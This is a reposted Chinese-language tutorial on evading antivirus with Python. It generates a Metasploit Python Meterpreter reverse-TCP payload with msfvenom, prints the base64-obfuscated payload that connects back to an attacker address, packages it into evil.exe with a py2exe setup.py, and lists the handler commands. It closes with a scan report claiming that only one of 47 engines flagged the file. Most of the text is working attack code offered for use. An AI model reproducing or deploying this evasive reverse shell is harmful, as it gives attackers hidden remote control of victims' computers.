溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

使用Python進(jìn)行防病毒免殺解析

發(fā)布時(shí)間:2020-09-23 10:41:51 來(lái)源:腳本之家 閱讀:174 作者:Bypass 欄目:開(kāi)發(fā)技術(shù)

很多滲透工具都提供了權(quán)限維持的能力,如Metasploit、Empire和Cobalt Strike,但是都會(huì)被防病毒軟件檢測(cè)到這種惡意行為。在探討一個(gè)權(quán)限維持技巧的時(shí)候,似乎越來(lái)越多的人關(guān)注的是,這個(gè)方式會(huì)不會(huì)被被殺軟殺掉?

打造免殺的payload成了一個(gè)很重要的話題,在這里,本文將介紹如何使用Pyhton輕松繞過(guò)防病毒軟件。

0x01 環(huán)境準(zhǔn)備

1、軟件安裝

Python 2.7.16 x86:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe 32位:https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

使用Python進(jìn)行防病毒免殺解析

evil.py 代碼如下:

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

將evil.py復(fù)制到windows,同時(shí)創(chuàng)建一個(gè)setup.py文件:

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

下面的方法運(yùn)行 evil.py,生成可執(zhí)行文件。

python ./setup.py py2exe

使用Python進(jìn)行防病毒免殺解析

0x03 設(shè)置監(jiān)聽(tīng)端口

Kali 運(yùn)行Metasploit,設(shè)置監(jiān)聽(tīng):

msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run

在Windows中運(yùn)行evil.exe,獲得一個(gè)meterpreter的會(huì)話

使用Python進(jìn)行防病毒免殺解析

0x04 免殺驗(yàn)證

確認(rèn)生成的exe文件可正常工作,接下來(lái)對(duì)evil.exe進(jìn)行在線病毒掃描,以確認(rèn)免殺效果如何。
這里我們使用VirSCAN.org-多引擎在線病毒掃描網(wǎng) v1.02,當(dāng)前支持 47 款殺毒引擎

使用Python進(jìn)行防病毒免殺解析

掃描結(jié)果:47款殺毒引擎中,只有一個(gè)引擎報(bào)毒,主流的殺毒軟件全部繞過(guò)。

網(wǎng)站地址: http://www.virscan.org 

參考文章:

https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

總結(jié)

以上所述是小編給大家介紹的使用Python進(jìn)行防病毒免殺,希望對(duì)大家有所幫助,如果大家有任何疑問(wèn)請(qǐng)給我留言,小編會(huì)及時(shí)回復(fù)大家的。在此也非常感謝大家對(duì)億速云網(wǎng)站的支持!
如果你覺(jué)得本文對(duì)你有幫助,歡迎轉(zhuǎn)載,煩請(qǐng)注明出處,謝謝!

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI